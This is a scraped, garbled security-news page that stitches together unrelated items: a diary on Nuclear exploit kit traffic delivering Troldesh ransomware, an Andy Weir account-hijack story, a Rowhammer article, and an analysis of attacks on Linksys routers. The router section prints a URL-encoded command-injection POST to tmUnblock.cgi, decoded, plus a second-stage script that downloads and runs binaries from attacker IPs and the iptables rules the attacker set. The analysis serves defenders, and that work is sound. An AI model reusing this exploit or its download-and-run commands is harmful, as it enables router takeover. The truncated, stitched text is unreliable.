Information Security News
About two weeks ago, Nuclear exploit kit (EK)changed its URL patterns. Now it looks a bit likeAngler EK. Kafeine originally announced the change on 2015-07-21 , and we collected examples the next day.
Heres how Nuclear EK looked on" />
Now that were into August 2015,URL patterns for Nuclear EK have altered again. These changes are similar to weve seen withAngler EK since June 2015 . Theyre not the same URL patternsas Angler, but the changes are similar.
In todays diary, weexamine Nuclear EKtraffic as of Tuesday, 2015-08-04. In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I publishedearlier this year in April 2015.
First, lets see how the 2015-08-04 traffic from a compromised website led to Nuclear EK.
From a compromised web site to the EK
I viewed the compromised website by getting to it through a Bing search, which is my preferred method for generating EK traffic. Google had already identified the site as potentially malicious and wouldn" />
Whats the easiestway to deobfuscate the script? Copy and paste the script into its own HTML file, make sure you" />
Open the resulting web page in a browser, and you should see an alert showing the deobfuscated script. From the aboveexample, we finda hidden iframe that goes to mobi-avto.ru." />
With any EK, this all happens behind the scenes. The average user wont know what happened until its too late. With ransomware, users will realize something" />
Shown above: The infected hosts desktop after the Troldesh ransomware infection.
A look at theNuclear EK traffic
On 2015-07-21 when Nuclear changed, each GET request from the EK started with search?q=. URL patterns remained that way through at least 2015-07-30 . A few days later, the landing page URL still containssearch?q=. However, other URLs for the Flash exploit and payload use different words.They also follow a differentpattern after the question mark (?) up to the equal sign (=). Below shows our example of" />
In the 2015-08-04 traffic,Nuclear EKs landing page has some text before the initialHTML tag. This is something wehadn" />
Except for the change in the URL pattern, this HTTP GETrequest for the EKs Flash exploit is similar to what we" />
Nuclear EK still uses an ASCII string to XOR the payload binary. This started with Nuclears previous change of URL patterns back in December 2014 , and it remains the EK" />
Additional information from the infected host
Filtering the traffic in Wireshark, we see SSL activity to 126.96.36.199 over port 443 and 188.8.131.52 over port 995. Although this traffic is related to the Troldesh ransomware,those IP addressesarenot inherently malicious. " />
The README text files fromthe desktop were identical. " />
Hey,Google. Someone is using Gmail accounts for nefarious purposes. Bet you havent seen that before! Ah, free services... A cyber-criminals delight!
In recent months, weve seen a lot of ransomware from EK traffic. This has been primarily (but not limited to)Angler, Magnitude, and NuclearEK. Most of the ransomware has been CryptoWall 3.0 , but every once in a while, well see something like AlpaCrypt/TeslaCryptor Toldesh . Well continue to monitor EK traffic andpost any significant changes.
A pcap of the 2015-08-04 Nuclear EK infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you dont know it, email [email protected] and ask.
Andy Weir is the creator of Mark Watney, a fictional astronaut who can solve any problem the harsh environment of Mars throws his way.
But Weir, author of The Martian, ran into a tricky problem on Earth this week when his e-mail and Twitter accounts were hacked. The culprit, he says, was a hacker who reset the password for his Comcast.net e-mail account by calling Comcast and pretending to be him. Comcast let the hacker take control of his e-mail account after asking "security questions" for which the answers were easy to find, according to Weir.
"Well I got hacked," Weir wrote on Facebook last night. "Someone compromised my e-mail account and twitter account. I don't know how they got the password. My guess is they socially engineered a password reset on my e-mail account, and they used that to do a password reset on Twitter. They also set up an e-mail forward to an account they control, so even after I changed my e-mail password they were still getting my e-mails until I found that. Whee."
In March, researchers revealed one of the more impressive if slightly esoteric hacks in recent memory—an attack that exploited physical weaknesses in computer memory chips to hijack the operating system running on them. Now a separate research team has unveiled techniques that make the attack more practical by allowing hacked or malicious websites to carry it out against unsuspecting visitors.
The "bitflipping" attack exploits physical flaws in certain DDR3 chip modules. By repeatedly accessing specific memory locations millions of times per second, attackers can cause zeroes to change to ones and vice versa in nearby memory locations. These bitflips can make it possible for an untrusted application to gain nearly unfettered system privileges or to bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources. Early versions of the attack worked only by running special code that wasn't practical in website environments, making the weakness hard to exploit in large, drive-by-style campaigns.
Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable cgi script (tmUnblock.cgi">184.108.40.206 - - [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 - -
220.127.116.11 - - [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 - -">POST /tmUnblock.cgi HTTP/1.1
Host: [server ip address]:8080
%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60">submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2echo #!/bin/sh echo wget -O irk2.sh hxxp://18.104.22.168/ferry/rev12.sh echo chmod +x irk2.sh echo ./irk2.sh ./irk1.sh`StartEPI=1
Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The irk2.sh / rev12.sh">#!/bin/sh
wget -O .nttpd hxxp://22.214.171.124/ferry/.nttpd,14-le-t1
chmod +x .nttpd
wget -O .sox http://126.96.36.199/ferry/.sox,14-le-t1
chmod +x .sox
The script downloads and runs two additional executables. I havent done the full analysis yet (let me know if you want a copy and can">INPUT -p udp --dport 9999 -j DROP
INPUT -p tcp -m multiport --dport 80,8080 -j DROP
INPUT -s 188.8.131.52 -j ACCEPT
INPUT -s 184.108.40.206 -j ACCEPT
INPUT -s 220.127.116.11 -j ACCEPT
INPUT -s 18.104.22.168 -j ACCEPT
INPUT -s 22.214.171.124 -j ACCEPT
So looks like the attacker is securing the router by blocking access to the web based admin (port 80, 8080) and allowing access from very specific IP addresses, probably controlled by the attacker.
Virustotal identifies .nttpd and .soxas a proxy(Avast, DrWeb) . Reports for these binaries go back a few months.
The scripts also appear to modify name servers in resolv.conf, but so far I think they only set them to Googles name servers (126.96.36.199 and 188.8.131.52).
FWIW: per whois,184.108.40.206, belongs to Serverel, a California company (but it is RIPE IP address space).[email protected] was notified.